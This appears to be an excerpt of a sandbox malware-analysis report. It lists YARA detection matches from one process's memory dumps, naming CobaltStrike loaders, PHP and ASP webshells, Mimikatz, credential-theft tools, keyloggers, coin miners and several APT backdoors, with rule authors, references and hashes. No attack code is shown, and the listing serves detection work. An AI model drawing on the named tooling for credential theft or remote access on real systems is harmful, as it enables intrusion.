Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ham_backdoor author = Cylance Spear Team, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
